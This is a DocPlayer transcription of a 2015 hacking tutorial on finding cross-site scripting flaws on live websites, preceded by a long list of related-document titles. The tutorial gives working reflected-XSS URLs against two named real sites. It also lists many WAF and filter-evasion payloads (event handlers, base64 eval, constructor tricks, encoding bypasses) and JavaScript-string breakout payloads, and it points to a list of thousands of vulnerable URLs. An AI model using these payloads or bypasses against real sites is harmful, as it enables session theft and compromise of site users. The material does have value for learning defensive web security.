Finding XSS in Real World



Similar documents
XSS Lightsabre techniques. using Hackvertor

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

JavaScript: Introduction to Scripting Pearson Education, Inc. All rights reserved.

A Tale of the Weaknesses of Current Client-side XSS Filtering

Network Security Web Security

A Tale of the Weaknesses of Current Client-Side XSS Filtering

Project 2: Web Security Pitfalls

Universal XSS via IE8s XSS Filters

Protection, Usability and Improvements in Reflected XSS Filters

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Carlos Muñoz Application Security Engineer WhiteHat

1 Web Application Firewalls implementations, common problems and vulnerabilities

Web Application Attacks And WAF Evasion

Government Girls Polytechnic, Bilaspur

Browser tools that make web development easier. Alan Seiden Consulting alanseiden.com

Web Application Guidelines

Complete Cross-site Scripting Walkthrough

Intrusion detection for web applications

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Attacks on Clients: Dynamic Content & XSS

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

TCP/IP Networking, Part 2: Web-Based Control

HTTPParameter Pollution. ChrysostomosDaniel

Advanced XSS. Nicolas Golubovic

IMRG Peermap API Documentation V 5.0

Login with Amazon. Getting Started Guide for Websites. Version 1.0

Client-side Web Engineering From HTML to AJAX

Short notes on webpage programming languages

Cross Site Scripting Prevention

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

OPENTABLE GROUP SEARCH MODULE GETTING STARTED ADD RESERVATIONS TO YOUR WEBSITE

Bypassing Internet Explorer s XSS Filter

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in

Uploaded images filter evasion for carrying out XSS attacks

HTML Form Widgets. Review: HTML Forms. Review: CGI Programs

Web Development CSE2WD Final Examination June (a) Which organisation is primarily responsible for HTML, CSS and DOM standards?

Blackbox Reversing of XSS Filters

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

Unraveling Unicode: A Bag of Tricks for Bug Hunting

MASTERTAG DEVELOPER GUIDE

JavaFX Mashups. Martin Gunnarsson, Pär Sikö, Jayway. fredag 26 oktober 12

Visualizing an OrientDB Graph Database with KeyLines

JavaScript Testing. Beginner's Guide. Liang Yuxian Eugene. Test and debug JavaScript the easy way PUBLISHING MUMBAI BIRMINGHAM. k I I.

Web App Development Session 1 - Getting Started. Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola

EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS

Website Login Integration

JavaScript Basics & HTML DOM. Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Cross-Site Scripting

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map

Security at Scale: Effective approaches to web application

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Web Programming Step by Step

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.

InternetVista Web scenario documentation

«W3Schools Home Next Chapter» JavaScript is THE scripting language of the Web.

TweetAttacks Pro. User Manual

Webapps Vulnerability Report

Visualizing a Neo4j Graph Database with KeyLines

Next Generation Clickjacking

Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code

CIS 467/602-01: Data Visualization

AJAX and JSON Lessons Learned. Jim Riecken, Senior Software Engineer, Blackboard Inc.

Dynamic Web-Enabled Data Collection

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK

(WAPT) Web Application Penetration Testing

Course Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation

Check list for web developers

CTF Web Security Training. Engin Kirda

Step One Check for Internet Connection

jquery Tutorial for Beginners: Nothing But the Goods

Customising Your Mobile Payment Pages

Yandex.Widgets Quick start

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Web Application Security

Phishing by data URI

Example. Represent this as XML

25 Million Flows Later - Large-scale Detection of DOM-based XSS

NewsletterAdmin 2.4 Setup Manual

Precise client-side protection against DOM-based Cross-Site Scripting

Advanced Web Development SCOPE OF WEB DEVELOPMENT INDUSTRY

1. Building Testing Environment

Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum

JavaScript Security. John Graham Cumming

How to Create an HTML Page

Debugging JavaScript and CSS Using Firebug. Harman Goei CSCI 571 1/27/13

Transcription:

Finding XSS in Real World by Alexander Korznikov nopernik@gmail.com 1 April 2015

Hi there, in this tutorial, I will try to explain how to find XSS in real world, using some interesting techniques. All of you know, that XSS is based on some code injection. It maybe <script> tag injection, or just an -alert()-, I will explain about that later. What do you need to find an XSS? Simply, only browser. But, if you want to find it much faster, you may use this software: 1. Firefox Browser 2. FireBug Add-on 3. HackBar Add-on 4. Google. I wanted to learn some advanced techniques of XSS, and found pretty cool way: http://xssposed.org There are tons of verified XSS s published by lot of security researchers, affecting VIP sites also. VIP website on xssposed.org is Google PR > 6 or Alexa Rate < 50000. So, I ve wrote a script that grabbed all xssposed.org XSS urls, and started to filter out not interesting fields. There were about 7500 urls. You can download a list from here: https://ghostbin.com/paste/n6vk7/raw and filter out all you don t need. Real XSS (HTML Injection) Demo. I will take a real examples of XSSs from xssposed.org that were not patched a very, very long time. Our first target will be www.tcdb.org, XSS report dated 14/06/2008. From that date, same XSS was reported more 3 times.

Take a look at the search field. Let s enter inside some RANDOMSTRING inside <xxx> tag. Purpose of this test is to validate, if there is some user input sanitation: <xxx>randomstring<xxx> As output, we see our RANDOMSTRING without <xxx> tags.

Let s take a look at the source: // CTRL+U in Firefox and Chrome As you can see, there is no filtration, and our <xxx> tag passed to browser as HTML. Purple color means that the <xxx> interpreted as tag. Finally, we enter: <script>alert(document.domain)</script>

One thing you should notice: there is no GET parameters in URL. In this example the POST was used. Open Hack-Bar add-on in Firefox, and after you come to search results, press Load URL and press on checkbox: Enable Post data Some server-side scripts, handle GET and POST requests the same way. Let s check it: http://www.tcdb.org/search/index.php?query=%3cscript%3ealert%28document.domain%29%3c%2fscript%3e

2. WAF Filter Evasions: What if the <script> tag is filtered out? Some WAF evasion cheat-sheets that we can use <script> tag, but I ve never seen this in real world. So I don t even try it. Some variations: <img src=x onerror=alert()> <img/src=x onerror= alert() > <svg onload=alert()> <svg/onload= alert() > <marquee onstart=alert()> <div style= width:1000px;height:1000px onmouseover=alert()>asdfa</div> <a onmouseover=alert()>some random text What if alert() is filtered? confirm() prompt() window[ alert ]( xss ) window['ale'+'rt']('xss') eval(window.atob('ywxlcnqoj3hzcycp')) //decode base64 string && execute eval(window['atob']('ywxlcnqoj3hzcycp')) window['e'+'v'+'a'+'l'](window['atob']('ywxlcnqoj3hzcycp')) Awesome evasion technique: []["filter"]["constructor"]( CODE )() eval( alert() ) will be equal to: []["filter"]["constructor"]( window['atob']('ywxlcnqoj3hzcycp') )() //equals to eval() And more evasion: []["fil"+"ter"]["constr"+"uctor"]( window['atob']('ywxlcnqoj3hzcycp') )() document.body += atob( PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ ) //decoded base64 == <script>alert()</script> Some reference on []() functions: false =>![] true =>!![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 =>!+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean =>![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")()

Some security researchers go deeper, and develop tools like: http://www.jsfuck.com/ http://patriciopalladino.com/files/hieroglyphy/ That will convert your JavaScript CODE only with []()!+ characters. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) Thanks to Patricio Palladino and Martin Kleppe. So you understand string manipulation like ale + rt Will not going to explain it again :) What if () characters are filtered? onerror=alert; throw xss document.body += string will append your string to the end of <body> tag. document.body += <script>alert\x28\x29</script> // in HEX: \x28 == ( and \x29 == ) Or you can encode the whole string <script>alert()</script> in HEX: document.body += \x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e Or just use your XSS as open redirect: document.location = http://google.com //open redirect Again, document.location == document[ locati + on ]. Keep that in mind. As additional reference, I recommend to read this book: http://dl.packetstormsecurity.net/papers/bypass/waf_bypassing_by_rafaybaloch.pdf Simple HTML injections are easy to sanitize. Filter out tags and = characters, and it will be painful job of finding XSS. For example, Microsoft.NET 4 marking as Dangerous Request every request with character < followed by almost any ASCII character. I ve not found a way of evasion. So <s or <m or </ will be marked as dangerous. So the only way to bypass it is to use onmouseover=alert() > in case if = is not filtered out. ModSecurity doesn t know about confirm() Some others don t handle Unicode encoding and/or double URL encoding. If you can t use onload keyword, try onl%00oad or onl%u006fad or onl%256fad Or if = character is filtered or marked as dangerous, try onload%u003d //Null Byte / Unicode / Double URL //Unicode representation of = char Fine. This is over. Next, I will show you a real example of Inline JavaScript injection.

3. Inline JavaScript injection. The interesting thing, that this type of injection can be found on popular websites. Even if there a sanitation of tags, and equal character XSS is possible. If the logic of web-site (no matter if it s server-side or client-side), reflects user s input in web-page s javascript, we can utilize it for nasty purposes :) Simple example: We have URL: http://www.example.com/?id=1&style=blue 1. Parameter id is handled by Server-Side logic, checking for INTEGER 2. Parameter style handled by client-side javascript and reflected in this context: var site.style = blue If we pass to the parameter style string: blue //single quote The context will be: var site.style = blue This will throw an javascript exception: SyntaxError: unterminated string literal Model: \string\trash\string\ blue //unclosed string In case of double quote, the query will be blue: SyntaxError: unterminated string literal In case if ID parameter handled by client-side, and reflected in context: var site.id = 1 Injected payload id=1 trash will look like: var site.id = 1 trash That will also throw an SyntaxError exception. In case if our payload will look like style=blue\ var site.style = blue\ Again, will be SyntaxError exception, because javascript interprets \ as escaped quote. So we can develop a noninvasive XSS locator: >trash\ single quote / double quote / space / greater sign / sting / backslash Some examples that this locator will break: //in case of no filtration HTML Code break: RED: Rendered as tags / BLUE: throwed out at the screen <a href= http://example.com/?id=1&style= >trash\ style= blablabla > Javascript SyntaxErrors: RED: Syntax errors var a = blue >trash\ a=unescape( blue >trash\ ) var a = blue " >trash\

Sometimes web-site logic will escape or characters, so try to add to our locator \ \ >trash\ as result you may see: var a = blue\\ \\ >trash\ \ as input will be \\ as output, so our backslash is escaped, and quotation mark rendered. One more thing to remember, that we can perform all mathematical operations for all objects in javascript. For example, we can: ale + rt, or a - b or a * b. Google for more info :) Examples of nasty javascript injections with various payloads: var a = blue var a = blue - alert( xss ) - //alert() will be executed var b = [ red, blue,alert( xss ), ] var c = func( blue +alert(/xss/))//) //after // the rest of line will be commented Inline Javascript Real Demo. Our second target will be www.nbcunicareers.com, XSS report date: 28/06/2014 For making our life easier we will need FireBug and Hack-Bar Firefox addons. Entering our XSS locator ( >trash\) to the website s Find Jobs input field:

Got us to this URL: http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\ and as response we will get: As you can see in FireBug s output, thrown an exception - SyntaxError: missing } after property list. By clicking on the green URL right after the SyntaxError, we will get generated JavaScript source code: As you can notice, on lines 570 and 577 the code was broken: After server-side logic, out XSS locator looks like: ">trash\ So the and > tags are converted to HTML entities " > accordingly.

But the single quote is not converted, and only that broke the JavaScript code. Let s test for other useful characters () and enter this payload: -a()- Looks pretty good, characters aren t converted and passed to generated JavaScript. How JavaScript understands this payload? closes string, - subtracts results of a() function So, our final payload should look like: -alert( XSS )- and should not brake generated JavaScript execution. pwned again :) Ask & comment at www.korznikov.com That s all folks!

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information